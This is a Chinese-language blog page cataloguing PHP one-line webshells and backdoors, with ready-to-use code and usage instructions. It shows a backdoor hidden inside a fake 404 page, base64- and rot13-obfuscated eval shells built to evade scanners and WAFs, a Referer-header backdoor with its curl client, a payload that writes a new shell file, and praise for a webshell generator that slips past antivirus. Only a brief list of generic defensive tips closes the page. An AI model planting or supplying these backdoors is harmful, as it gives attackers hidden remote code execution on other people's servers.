2. 程式人生 > >php 一句話木馬、後門

php 一句話木馬、後門

阿新 發佈:2018-12-30

強悍的PHP一句話後門

這類後門讓網站、伺服器管理員很是頭疼,經常要換著方法進行各種檢測,而很多新出現的編寫技術,用普通的檢測方法是沒法發現並處理的。今天我們細數一些有意思的PHP一句話木馬。

利用404頁面隱藏PHP小馬:

<strong><!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?></strong>
404頁面是網站常用的檔案,一般建議好後很少有人會去對它進行檢查修改,這時我們可以利用這一點進行隱藏後門。

無特徵隱藏PHP一句話:

<strong><?php
session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');</strong>

將$_POST['code']的內容賦值給$_SESSION['theCode'],然後執行$_SESSION['theCode'],亮點是沒有特徵碼。用掃描工具來檢查程式碼的話,是不會報警的,達到目的了。

超級隱蔽的PHP後門:

<strong><?php $_GET[a]($_GET[b]);?></strong>

僅用GET函式就構成了木馬;

利用方法:

?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x
 
%29%29};

執行後當前目錄生成c.php一句話木馬,當傳參a為eval時會報錯木馬生成失敗,為assert時同樣報錯,但會生成木馬,真可謂不可小視,簡簡單單的一句話,被延伸到這般應用。

層級請求,編碼執行PHP後門:
此方法用兩個檔案實現,檔案1

<?php
//1.php
header('Content-type:text/html;charset=utf-8');
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10' && count($a) == 9) {
   eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}


檔案2

<?php
//2.php
header('Content-type:text/html;charset=utf-8');
//要執行的程式碼
$code = <<<CODE
phpinfo();
CODE;
//進行base64編碼
$code = base64_encode($code);
//構造referer字串
$referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//後門url
$url = 'http://localhost/test1/1.php';
$ch = curl_init();
$options = array(
    CURLOPT_URL => $url,
    CURLOPT_HEADER => FALSE,
    CURLOPT_RETURNTRANSFER => TRUE,
    CURLOPT_REFERER => $referer
);
curl_setopt_array($ch, $options);
echo curl_exec($ch);


通過HTTP請求中的HTTP_REFERER來執行經過base64編碼的程式碼,來達到後門的效果,一般waf對referer這些檢測要鬆一點,或者沒有檢測。用這個思路bypass waf不錯。

PHP後門生成工具weevely

weevely是一款針對PHP的webshell的自由軟體,可用於模擬一個類似於telnet的連線shell,weevely通常用於web程式的漏洞利用,隱藏後門或者使用類似telnet的方式來代替web 頁面式的管理,weevely生成的伺服器端php程式碼是經過了base64編碼的,所以可以騙過主流的防毒軟體和IDS,上傳伺服器端程式碼後通常可以通過weevely直接執行。

weevely所生成的PHP後門所使用的方法是現在比較主流的base64加密結合字串變形技術,後門中所使用的函式均是常用的字串處理函式,被作為檢查規則的eval,system等函式都不會直接出現在程式碼中,從而可以致使後門檔案繞過後門查詢工具的檢查。使用暗組的Web後門查殺工具進行掃描,結果顯示該檔案無任何威脅。

三個變形的一句話PHP木馬
第一個

<?php ([email protected]$_GET[2])[email protected]$_($_POST[1])?>

在菜刀裡寫http://site/1.php?2=assert密碼是1

第二個

<?php
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>

在菜刀裡寫http://site/2.php?_=assert&__=eval($_POST['pass']) 密碼是pass。如果你用菜刀的附加資料的話更隱蔽,或者用其它注射工具也可以,因為是post提交的。

第三個

<span style="font-size:12px;font-variant:inherit; line-height:inherit">($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');</span>

str_rot13(‘riny’)即編碼後的eval,完全避開了關鍵字,又不失效果,讓人吐血!

最後列幾個高階的PHP一句話木馬後門:

<strong>1、
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
//菜刀一句話
2、
$filename=$_GET['xbid'];
include ($filename);
//危險的include函式,直接編譯任何檔案為php格式執行
3、
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
//重新命名任何檔案
4、
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
//菜刀一句話
5、include ($uid);
//危險的include函式,直接編譯任何檔案為php格式執行,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif
//gif插一句話
6、典型一句話
程式後門程式碼
<?php eval_r($_POST[sb])?>
程式程式碼
<?php @eval_r($_POST[sb])?>
//容錯程式碼
程式程式碼
<?php assert($_POST[sb]);?>
//使用lanker一句話客戶端的專家模式執行相關的php語句
程式程式碼
<?$_POST['sa']($_POST['sb']);?>
程式程式碼
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
程式程式碼
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
//使用這個後,使用菜刀一句話客戶端在配置連線的時候在"配置"一欄輸入
程式程式碼
<O>[email protected]_r($_POST1);</O>
程式程式碼
<script language="php">@eval_r($_POST[sb])</script>
//繞過<?限制的一句話</strong>

綜上,這些PHP一句話後門可謂五臟俱全,一不小心您肯定中招了,而我們今天這篇文章的重中之重在哪呢?重點就在下邊的總結!

如何應對PHP一句話後門:

我們強調幾個關鍵點,看這文章的你相信不是門外漢,我也就不囉嗦了:

1,對PHP程式編寫要有安全意識
2,伺服器日誌檔案要經常看,經常備份
3,對每個站點進行嚴格的許可權分配
4,對動態檔案及目錄經常批量安全審查
5,學會如何進行手工防毒《即行為判斷查殺》
6,時刻關注,或滲入活躍的網路安全營地
7,對伺服器環境層級化處理,哪怕一個函式也可做規則

我們認為當管理的站點多了,資料量大時,我們應合理應用一些輔助工具,但不應完全依賴這些工具,技術是時刻在更新進步的,最為重要的是你應學會和理解,編寫這些強悍後門的人所處思維,角色上的換位可為你帶來更大的進步。


相關推薦

php 一句話木馬後門

強悍的PHP一句話後門 這類後門讓網站、伺服器管理員很是頭疼,經常要換著方法進行各種檢測,而很多新出現的編寫技術,用普通的檢測方法是沒法發現並處理的。今天我們細數一些有意思的PHP一句話木馬。 利用404頁面隱藏PHP小馬: <strong><!DOC

PHP一句話木馬Webshell變形免殺總結

0×00 前言   大部分Webshell查殺工具都是基於關鍵字特徵的,通常他們會維護一個關鍵字列表,以此遍歷指定副檔名的檔案來進行掃描,所以可能最先想到的是各種字串變形,下面總結了一些小的方法,各種不足之前還請看官拍磚.   0×01 字串上的舞蹈     一

PHP程式木馬漏洞排查

摘自西部數碼: 1、PHP程式提示sql注入漏洞的處理方法 http://faq.myhostadmin.net/faq/listagent.asp?unid=645 2、  已被入侵的dede網站,下載專殺工具掃描查殺: http://faq.myhostadmin.net/

PHP 一句話木馬

特殊 技術 函數返回 code 分享 span ima rap .com eval 函數 eval() 函數把字符串按照 PHP 代碼來計算 該字符串必須是合法的 PHP 代碼,且必須以分號結尾 如果沒有在代碼字符串中調用 return 語句,則返回 NU

PHP一句話木馬研究

quest params slide tin gin 相同 handler 函數參數 方法 最近在研究PHP一句話後門,查閱了很多大佬的博客,並從中衍生出了一些可用的方法。 現總結如下: 方案一:回調函數 回調函數:Callback (即call then back 被主

那些強悍的PHP一句話後門

強悍的PHP一句話後門 常用一: <?php $a=range(1,200);$b=chr($a[96-1+1]).chr($a[114-1+1]).chr($a[114-1+1]).chr($a[100-1+1]).chr($a[113-1+1]).ch

PHP程式碼審計之路——5.程式碼執行及一句話木馬總結

mixed eval ( string $code ) 把字串 code 作為PHP程式碼執行 bool assert ( mixed $assertion [, string $description ] ) PHP 5bool assert ( mixed $asse

PHP一句話後門

1、利用404頁面隱藏一句話 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title>

PHP一句話後門過狗姿勢萬千之後門構造與隱藏

第二章節主要帶給大家一些後門構造思路,與安全狗檔案特徵檢測的機制。 另外強調一下,這篇文章需要大家對於php有一定的認識。 本章節分為三大部分,第一部分針對初級,分析菜刀php程式碼的執行過程,較基礎;第二部分主要總結一些可以利用的後門姿勢,這部分我主要給大家分享一些蒐集

php 過狗一句話木馬的編寫

我們都知道 這個是php一句話  <?php assert($_POST['mima']); ?>可是伺服器的安全狗會識別到,我們要經過一些處理, 讓安全狗不能認出我們的程式碼是一句話木馬。 好多小白只會用一句話,但是不知道原理,我先大概說一下一句話木馬的

一句話木馬(webshell)是如何執行命令的

webshell 一句話木馬 在很多的滲透過程中,滲透人員會上傳一句話木馬(簡稱webshell)到目前web服務目錄繼而提權獲取系統權限,不論asp、php、jsp、aspx都是如此,那麽一句話木馬到底是如何執行的呢,下面我們就對webshell進行一個簡單的分析。首先我們先看一個原始而

Centos下Yum安裝PHP 5.55.67.0

mbstring eas common mysql 編譯安裝 test .rpm mysq cli Centos系統自帶的php版本很低,如果我們需要使用高版本的php,可以不用編譯安裝,直接用yum安裝會非常省時省力。 1.檢查當前安裝的PHP包yum list inst

PHP的htmlspecialcharsstrip_tagsaddslashes

null ash 若是 轉化 所有 雙引號) 還在 ips 斜線 PHP的htmlspecialchars、strip_tags、addslashes是網頁程序開發中常見的函數,今天就來詳細講述這些函數的用法: 1.函數strip_tags:去掉 HTML 及 PHP 的標

php的註釋變量類型常量運算符比較符條件語句;

小數 array cas 單引號 標識 php 規則 tro 特殊 php的註釋 1.// 2.# 3./* */ 變量 變量是儲存信息的容器; 變量規則: 1.變量以$開頭,後面跟名稱》》》$sum; 2.變量必須以字母或下滑先開頭,不能用數字開頭; 3.變量名稱對大小

apache虛擬主機防止php網頁木馬vhost.conf文件配置

dir follow col sym tom common .cn 虛擬 dex <VirtualHost *> DocumentRoot "/www/www.abc.com" ServerName www.abc.com Server

+++++++php組件SQL組件

struggle strive endeavo一、php基本應用Hypertext Preprocessor 嵌入thml文檔的腳本編程語言,動態網站的開發語言源碼獲取:www.php.net動態網站開發php, asp, ruby, c, bash<有程序功能的解釋器>"php通過庫調用完成操作

Centos6和Centos7上安裝LAMP(PHP-FPM模式編譯安裝)

安裝 centos6 lamp -------------------------實驗:CentOS 7安裝LAMP(PHP-FPM模式)---------------------1、安裝PHP-FPM首先要卸載PHP: yum remove php yum install php-fpm

PHP淺拷貝深拷貝簡析

php 淺拷貝 深拷貝 clone 克隆 前言: 在PHP中, “=” 作為賦值符號,對於普通變量是深拷貝,對於對象來說是淺拷貝(對象的賦值是引用賦值)。 註意:對象作為參數傳遞時,也是引用傳遞,無論函數定義時參數前面是否有&符號。簡述:

PHP中VC6VC9TSNTS版本的區別與用法詳解

進行 系統資源 stc 詳解 ron 線程安全 info 啟動 win 1. VC6與VC9的區別: VC6版本是使用Visual Studio 6編譯器編譯的,如果你的PHP是用Apache來架設的,那你就選擇VC6版本。 VC9版本是使用Visual Studio 20

php中$_REQUEST $_GET $_POST $_COOKIE 的關系和區別

one 相同 存取 dev efault light 變量 指定 request 看到REQUEST可以通吃GET 、POST 、COOKIE 後 感覺這個$_REQUEST太強大了是不是其他的幾個超級變量就沒有用了,下面對他們整體做個比較: 1.安全性 post>